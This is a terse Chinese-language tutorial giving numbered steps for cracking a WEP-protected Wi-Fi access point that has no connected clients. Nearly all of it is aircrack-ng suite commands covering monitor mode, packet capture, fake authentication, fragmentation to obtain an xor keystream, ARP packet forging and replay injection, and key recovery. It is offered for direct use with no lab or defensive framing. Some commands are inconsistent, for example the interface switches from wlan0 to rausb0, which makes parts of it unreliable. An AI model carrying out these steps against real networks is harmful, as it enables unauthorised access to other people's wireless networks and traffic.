一、无客户端wepP解简明步骤 (1)ifconfig –-a
(找网卡接口) (2)ifconfig –-a wlan0 up
(加载网卡) (3)airmon-ng
start wlan0
6
(设监听在6信道) (4)airodump-ng -w 123 -c 6 wlan0
(抓包保存) (5)aireplay-ng -1 0 -e AP的essid -a AP的mac -h网卡mac wlan0
上面是至关重要的虚连接
(6)tcpdump –n –e –s0 –vvv –i wlan0(查看虚连是否成功) (7)aireplay-ng
-5 -b ap的mac -h 自己网卡的mac rausb0
(注入)
然后用另外一张卡H假连接AP,成功得到xor文件
(8)packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 –l 255.255.255.255 –y ××××.xor -w mrarp
(打包xor) (9)aireplay-ng -2 –r mrarp
-x 1024 wlan0 上面是交互注入,AP的data 开始急剧增涨,到2万左右时,另开一窗口 (10)aircrack-ng -x -f 2 xxx.cap
(P解密码) |